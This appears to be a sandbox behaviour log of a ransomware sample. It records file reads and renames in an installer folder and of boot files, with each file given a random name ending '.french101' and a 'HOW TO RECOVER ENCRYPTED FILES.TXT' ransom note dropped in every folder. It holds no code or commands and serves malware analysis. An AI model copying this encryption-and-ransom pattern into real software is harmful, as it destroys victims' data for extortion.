Create	C:\588bce7c90097ed212\Client\UiInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\Z7RRkRFcQBdBGYeTXwVNTZas7ss.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\Parameterinfo.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Extended\Parameterinfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\uW0H=zaVc7icr8isatIa4LLVQxg8N1o=dlOzhBkxfVg0DA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\UiInfo.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Extended\UiInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\H6qGD01FFDSP1dc=PuW9qADZ4kk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Extended\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Print.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Print.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\0QxZJdnVFnYQqQKDAOVtx8Ua.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate1.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate1.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\xIH7u2S==HngjYvKwL4AyNR4Mj46kk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	3	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate2.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate2.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\ADSxsQxhSkGC59uQuRyt6TmPGiGZMA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate3.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate3.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\ePSyCTX57WSoK3=HeZUrKjOX6DdJOQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate4.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate4.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\gmzlW8+rVmTumEmu69VorzDBCy=3hk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	4	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate5.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate5.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\6VLprcDolr9osRAl3k41+++JR+gpr4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate6.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate6.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\tUmrc1FvD9+DpEY+cO86bKM5XW0rO4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate7.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate7.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\N0q3h2Dvx=iDVP0SostCs5KpOCUId4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Graphics\Rotate8.ico	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	System Paging File	type = size	249	Fn
Get Info	C:\	type = file_attributes	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	68	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Move	C:\=aapkMF4BrfwjEq1AE4.french101	source_filename = C:\BOOTNXT	1	Fn
Move	C:\0CwF8lftsEXdJY+5HdQoCyPOgwgzMKve.french101	source_filename = C:\BOOTSECT.BAK	1	Fn
Move	C:\588bce7c90097ed212\Oye6Orm9Wa6BwMMDUOA8uplze8AQ6=kea5QA3YzSafs.french101	source_filename = C:\588bce7c90097ed212\DHtmlHeader.html	1	Fn
Move	C:\588bce7c90097ed212\p+AUurmLLA4pklFbQwsS0h4tR97v8pPB3rEzEPCA.french101	source_filename = C:\588bce7c90097ed212\DisplayIcon.ico	1	Fn
Move	C:\588bce7c90097ed212\g4rsV=1JAEUoJ0X5BZ9a5CevqxA.french101	source_filename = C:\588bce7c90097ed212\header.bmp	1	Fn
Move	C:\588bce7c90097ed212\4DCD2YPTdhotX=asIt4J8zy1VCc9YvYshWaT6skDL9DOFGOL.french101	source_filename = C:\588bce7c90097ed212\netfx_Core_x64.msi	1	Fn
Move	C:\588bce7c90097ed212\sXAut9lWVsdOR85XBHd8+OmFAIQ8OoqUce4piCwT9RU4n2K5.french101	source_filename = C:\588bce7c90097ed212\netfx_Core_x86.msi	1	Fn
Move	C:\588bce7c90097ed212\0ddYhtihEnON4DYged=tnvJRa7Ly2RNFpqHOxDvupcmn0moBCuCN2RwMccQ.french101	source_filename = C:\588bce7c90097ed212\netfx_Extended_x64.msi	1	Fn
Move	C:\588bce7c90097ed212\BQNm0bd=m2wUvOvhllqDAlYwmoAH7=95JexDcqm+YgHUlUGsktIlxNEVreE.french101	source_filename = C:\588bce7c90097ed212\netfx_Extended_x86.msi	1	Fn
Move	C:\588bce7c90097ed212\loW03LH1NrST9RV272o=mVVOVcn9zheBPHduhp6ymTWmKQ.french101	source_filename = C:\588bce7c90097ed212\ParameterInfo.xml	1	Fn
Move	C:\588bce7c90097ed212\UPgLyPV2diQJZdGyWSnwjKjO061ZPq9Ayp1QdGV3ZJg.french101	source_filename = C:\588bce7c90097ed212\RGB9RAST_x64.msi	1	Fn
Move	C:\588bce7c90097ed212\=Jf=nC9t4puo4VnykhdQ=9bwFpk1fQSmspcHmyzvQCQ.french101	source_filename = C:\588bce7c90097ed212\RGB9Rast_x86.msi	1	Fn
Move	C:\588bce7c90097ed212\44fkMpst+ZFPdo5GyV03+K6xJCNrL4.french101	source_filename = C:\588bce7c90097ed212\SetupUi.xsd	1	Fn
Move	C:\588bce7c90097ed212\s2LSvD=NcOGoBE3gvPDoDv7TK6pxoLmJP8qtZ3nLZ2o.french101	source_filename = C:\588bce7c90097ed212\SplashScreen.bmp	1	Fn
Move	C:\588bce7c90097ed212\yDmN+p4a06mqUUb8m3ormI2YKcdhH4.french101	source_filename = C:\588bce7c90097ed212\Strings.xml	1	Fn
Move	C:\588bce7c90097ed212\hQp3uesheT3411KZ+oimCXjXrhQ.french101	source_filename = C:\588bce7c90097ed212\UiInfo.xml	1	Fn
Move	C:\588bce7c90097ed212\KjJAqeiW7OiuvFOnvguy9GekaspZSp9hGmY.french101	source_filename = C:\588bce7c90097ed212\watermark.bmp	1	Fn
Move	C:\588bce7c90097ed212\1025\7J8z6r=FbrhnXjlmaUdH2k.french101	source_filename = C:\588bce7c90097ed212\1025\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1025\qaNxm6B02FaQDzOdwMFjddbB5ivaevj+Jer4lHn7tibiik.french101	source_filename = C:\588bce7c90097ed212\1025\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1028\N0wcIUl71B6RrUSPtf=fwQ.french101	source_filename = C:\588bce7c90097ed212\1028\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1028\3zW=ZDHckgtLy9orglBgca+iALjOPx7guEsICStouibmC4.french101	source_filename = C:\588bce7c90097ed212\1028\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1029\nnXbshs0gTtt93z86HCqnA.french101	source_filename = C:\588bce7c90097ed212\1029\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1029\Xr9XWHD3q3c1Fg3i2Ii73VkXbJ58MuPdimNq3evBbo=DWA.french101	source_filename = C:\588bce7c90097ed212\1029\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1030\hpR+GnPFxfD8T1ZyFrqwJk.french101	source_filename = C:\588bce7c90097ed212\1030\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1030\PuLmg4kz4iUO+YSlFvB9Oqwpx=FRN0JeW5Al8oED+Cn8e4.french101	source_filename = C:\588bce7c90097ed212\1030\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1031\G7l440rGzpCUoNv5+Vf=94.french101	source_filename = C:\588bce7c90097ed212\1031\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1031\JmA=t=jIdXjmhA6cLiO1V1nTqP88o87=3eaaX4nbfpc7Fk.french101	source_filename = C:\588bce7c90097ed212\1031\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1032\J94P40rA2uVZwA9nQXdug4.french101	source_filename = C:\588bce7c90097ed212\1032\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1032\dlB12sJLMekf97DIBID=jTgnMuupXuIGDEwE2Dh6mLfMG4.french101	source_filename = C:\588bce7c90097ed212\1032\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1033\VCbgvLB6bk5gvjJ1mHUW4Q.french101	source_filename = C:\588bce7c90097ed212\1033\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1033\OUSgPOXI0xoEtkUetY9z4lwmzro92BeS05kffORCyrVQ5Q.french101	source_filename = C:\588bce7c90097ed212\1033\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1035\uWOU20Gf4z6kjao3S2KHyA.french101	source_filename = C:\588bce7c90097ed212\1035\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1035\k5Cc4o8jPGNe=hM5t3ztv+Vw1IrQN43OWa5Y9j=BneSr1Q.french101	source_filename = C:\588bce7c90097ed212\1035\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1036\7KfhbfTCxDtM4vdbZhIQM4.french101	source_filename = C:\588bce7c90097ed212\1036\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1036\zeO3fsc=jkrlpStOJ1nr5PXT2AaD+edX78mteIB05a9ZUQ.french101	source_filename = C:\588bce7c90097ed212\1036\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1037\URfWfKaOLBnIeqVKIkr9lk.french101	source_filename = C:\588bce7c90097ed212\1037\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1037\A6Sp2ADZ6ug7agx397Vv=Wb7OQx8MlTxkBnztsCrZyu8wk.french101	source_filename = C:\588bce7c90097ed212\1037\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1038\GTM5rHMJYIj5vncRwRwRT4.french101	source_filename = C:\588bce7c90097ed212\1038\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1038\+sYYZLCNv5Ume9ALuXonKTe65jLuGGGuN=UR3OLz2DQaok.french101	source_filename = C:\588bce7c90097ed212\1038\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1040\cRXncCJPLSyZdzdoi4qNuk.french101	source_filename = C:\588bce7c90097ed212\1040\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1040\WKRdENIya6cmJPpxuoLrGpa9eLZja5+uHtMsvaRkGTS0mQ.french101	source_filename = C:\588bce7c90097ed212\1040\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1041\qZviTx06yKGqY06ej5rXg4.french101	source_filename = C:\588bce7c90097ed212\1041\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1041\x4Rg5JzXr+wbktLoYzc6=B1P7ucKyAfakEWeAVHTFreAZ4.french101	source_filename = C:\588bce7c90097ed212\1041\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1042\oNaaV96b2IHYU16PUvk8rk.french101	source_filename = C:\588bce7c90097ed212\1042\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1042\HzU1fVnk=dIfPFNfOKw3v1oMgG8jx8XJbFcEa51fDQwonQ.french101	source_filename = C:\588bce7c90097ed212\1042\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1043\cBKg4SWVMpCksc+43x05RA.french101	source_filename = C:\588bce7c90097ed212\1043\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1043\YAopRJ0z0RGnbEOwV7fMLnU+whdNrZ2LITFNKGnKJB8gLA.french101	source_filename = C:\588bce7c90097ed212\1043\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1044\ZEVqNsKUOPPuClTLLtVciA.french101	source_filename = C:\588bce7c90097ed212\1044\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1044\4Pd39KVyMIHvfDa80Cqz3QOqtA6DM=TGVUWsWAEwr6PWDk.french101	source_filename = C:\588bce7c90097ed212\1044\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1045\y99Xr8wA2Hr7EZmRBLwu+Q.french101	source_filename = C:\588bce7c90097ed212\1045\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1045\tgsjuNw7TIfIFWwNB87mM3S2WeDxQ5RS7ijSvAjzuRCGPQ.french101	source_filename = C:\588bce7c90097ed212\1045\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1046\ReAoNvMFVUsZwXTTvw6jB4.french101	source_filename = C:\588bce7c90097ed212\1046\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1046\DSi+27cFVBYhPuq5MTuBR1cyxBGfJ+qY+Ff5FsZxIzpYOQ.french101	source_filename = C:\588bce7c90097ed212\1046\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1049\tcyx3o6S25VpsswEx0Cpnk.french101	source_filename = C:\588bce7c90097ed212\1049\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1049\zeLrW2YqT+QyTBRkGt+0=gQGuZegjlk=aJfWvZsD5S7eAQ.french101	source_filename = C:\588bce7c90097ed212\1049\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1053\YHEFAZ=+peduHPilVNvACk.french101	source_filename = C:\588bce7c90097ed212\1053\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1053\2UlmmFdmXf3jHxXf0Kbn0Uuf9YJHdc2hffQj7aixgqwc5A.french101	source_filename = C:\588bce7c90097ed212\1053\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\1055\yNkSrZ=dHzgO=52MaCGwnQ.french101	source_filename = C:\588bce7c90097ed212\1055\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\1055\2Tg4xH7Bxe1+pMm3tQ2pkBbd+rjDVGkI1dqO9P7iDgnq0A.french101	source_filename = C:\588bce7c90097ed212\1055\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\2052\rj63MYiNLskACSqG+=VWwA.french101	source_filename = C:\588bce7c90097ed212\2052\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\2052\Yz5AXqULpQhk+lvHwUFYRX2atu7P5qRTT1HiL=JMeuyrhQ.french101	source_filename = C:\588bce7c90097ed212\2052\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\2070\W=x1rFlgmb9WOmNXe8KPlQ.french101	source_filename = C:\588bce7c90097ed212\2070\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\2070\P=aYqIgfEBmwT=MAKmZQUYn6iG5ijVmXgRsTIR9uonSZkA.french101	source_filename = C:\588bce7c90097ed212\2070\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\3076\0s92NwdTiFlGhQyyEtdorQ.french101	source_filename = C:\588bce7c90097ed212\3076\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\3076\A6J7s3p1u3BGBe0MhmCJ+rgDT3=MCrcIF5RYFfMEjdqoTk.french101	source_filename = C:\588bce7c90097ed212\3076\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\3082\IxZIbBUYAOCNLr+QnPbd+4.french101	source_filename = C:\588bce7c90097ed212\3082\eula.rtf	1	Fn
Move	C:\588bce7c90097ed212\3082\tGdmHnjocwBYGlVQclZdLWU36UcQSVEt5QXiwy+VG+t5pk.french101	source_filename = C:\588bce7c90097ed212\3082\LocalizedData.xml	1	Fn
Move	C:\588bce7c90097ed212\Client\sJJEll8DFqbCbJstgQJNyRmV77d5+Jq5KazGbGKhtgbZeA.french101	source_filename = C:\588bce7c90097ed212\Client\Parameterinfo.xml	1	Fn
Move	C:\588bce7c90097ed212\Client\Z7RRkRFcQBdBGYeTXwVNTZas7ss.french101	source_filename = C:\588bce7c90097ed212\Client\UiInfo.xml	1	Fn
Move	C:\588bce7c90097ed212\Extended\uW0H=zaVc7icr8isatIa4LLVQxg8N1o=dlOzhBkxfVg0DA.french101	source_filename = C:\588bce7c90097ed212\Extended\Parameterinfo.xml	1	Fn
Move	C:\588bce7c90097ed212\Extended\H6qGD01FFDSP1dc=PuW9qADZ4kk.french101	source_filename = C:\588bce7c90097ed212\Extended\UiInfo.xml	1	Fn
Move	C:\588bce7c90097ed212\Graphics\0QxZJdnVFnYQqQKDAOVtx8Ua.french101	source_filename = C:\588bce7c90097ed212\Graphics\Print.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\xIH7u2S==HngjYvKwL4AyNR4Mj46kk.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate1.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\ADSxsQxhSkGC59uQuRyt6TmPGiGZMA.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate2.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\ePSyCTX57WSoK3=HeZUrKjOX6DdJOQ.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate3.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\gmzlW8+rVmTumEmu69VorzDBCy=3hk.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate4.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\6VLprcDolr9osRAl3k41+++JR+gpr4.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate5.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\tUmrc1FvD9+DpEY+cO86bKM5XW0rO4.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate6.ico	1	Fn
Move	C:\588bce7c90097ed212\Graphics\N0q3h2Dvx=iDVP0SostCs5KpOCUId4.french101	source_filename = C:\588bce7c90097ed212\Graphics\Rotate7.ico	1	Fn
Read	C:\BOOTNXT	size = 1, size_out = 1	1	Fn Data
Read	C:\BOOTSECT.BAK	size = 1024, size_out = 1024	1	Fn Data
Read	C:\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\DHtmlHeader.html	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\DisplayIcon.ico	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	4	Fn Data
Read	C:\588bce7c90097ed212\header.bmp	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	10	Fn Data
Read	C:\588bce7c90097ed212\netfx_Core_x64.msi	size = 1024, size_out = 1024	58	Fn Data
Read	C:\588bce7c90097ed212\netfx_Core_x86.msi	size = 1024, size_out = 1024	35	Fn Data
Read	C:\588bce7c90097ed212\netfx_Extended_x64.msi	size = 1024, size_out = 1024	26	Fn Data
Read	C:\588bce7c90097ed212\netfx_Extended_x86.msi	size = 1024, size_out = 1024	15	Fn Data
Read	C:\588bce7c90097ed212\ParameterInfo.xml	size = 1024, size_out = 1024	8	Fn Data
Read	C:\588bce7c90097ed212\RGB9RAST_x64.msi	size = 1024, size_out = 1024	5	Fn Data
Read	C:\588bce7c90097ed212\RGB9Rast_x86.msi	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\SetupUi.xsd	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\SplashScreen.bmp	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\Strings.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\UiInfo.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\watermark.bmp	size = 1024, size_out = 1024	3	Fn Data
Read	C:\588bce7c90097ed212\1025\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1025\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1025\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1028\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1028\LocalizedData.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1028\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1029\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1029\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1029\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1030\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1030\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1030\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1031\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1031\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1031\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1032\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1032\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1032\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1033\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1033\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1033\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1035\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1035\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1035\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1036\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1036\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1036\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1037\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1037\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1037\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1038\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1038\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1038\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1040\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1040\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1040\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1041\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1041\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1041\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1042\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1042\LocalizedData.xml	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1042\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1043\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1043\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1043\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1044\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1044\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
Read	C:\588bce7c90097ed212\1044\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175, size_out = 2175	1	Fn Data
Read	C:\588bce7c90097ed212\1045\eula.rtf	size = 1024, size_out = 1024	1	Fn Data
Read	C:\588bce7c90097ed212\1045\LocalizedData.xml	size = 1024, size_out = 1024	2	Fn Data
